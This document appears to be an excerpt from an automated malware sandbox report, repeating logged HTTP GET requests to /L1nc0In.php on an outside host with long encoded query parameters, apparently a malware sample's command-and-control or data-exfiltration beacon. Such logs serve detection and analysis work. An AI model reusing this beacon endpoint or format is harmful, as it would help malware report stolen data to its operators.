Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwI